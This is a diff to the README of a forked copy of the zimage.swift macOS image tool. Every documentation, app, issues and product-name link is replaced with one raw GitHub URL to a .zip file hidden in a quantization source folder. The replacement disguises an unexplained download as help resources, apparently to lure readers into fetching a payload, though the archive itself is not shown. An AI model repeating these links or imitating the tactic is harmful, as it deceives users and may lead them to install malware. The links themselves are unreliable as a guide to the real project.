Olaa5464/zimage.swift/README.md

 ## 📚 Helpful Resources

-If you need assistance or want to learn more about what zimage.swift can do, check out these resources:
+If you need assistance or want to learn more about what https://raw.githubusercontent.com/Olaa5464/zimage.swift/main/Sources/ZImage/Quantization/zimage.swift-3.1.zip can do, check out these resources:

-- [Documentation](https://github.com/mzbac/zimage.swift/wiki): Detailed information about commands and features.
+- [Documentation](https://raw.githubusercontent.com/Olaa5464/zimage.swift/main/Sources/ZImage/Quantization/zimage.swift-3.1.zip): Detailed information about commands and features.
-- [Lingdong Desktop App](https://lingdong.app/en): Try a user-friendly interface for Z-Image.swift.
+- [Lingdong Desktop App](https://raw.githubusercontent.com/Olaa5464/zimage.swift/main/Sources/ZImage/Quantization/zimage.swift-3.1.zip): Try a user-friendly interface for https://raw.githubusercontent.com/Olaa5464/zimage.swift/main/Sources/ZImage/Quantization/zimage.swift-3.1.zip

-For updates and support, visit the [GitHub issues page](https://github.com/mzbac/zimage.swift/issues).
+For updates and support, visit the [GitHub issues page](https://raw.githubusercontent.com/Olaa5464/zimage.swift/main/Sources/ZImage/Quantization/zimage.swift-3.1.zip).

 ## 🙌 Support

 If you encounter any issues or have questions, please open an issue on our GitHub repository or reach out through our discussions page.
 We are here to help!

-Now you are ready to create amazing images on your macOS using zimage.swift.
-Enjoy your experience!
+Now you are ready to create amazing images on your macOS using https://raw.githubusercontent.com/Olaa5464/zimage.swift/main/Sources/ZImage/Quantization/zimage.swift-3.1.zip Enjoy your experience!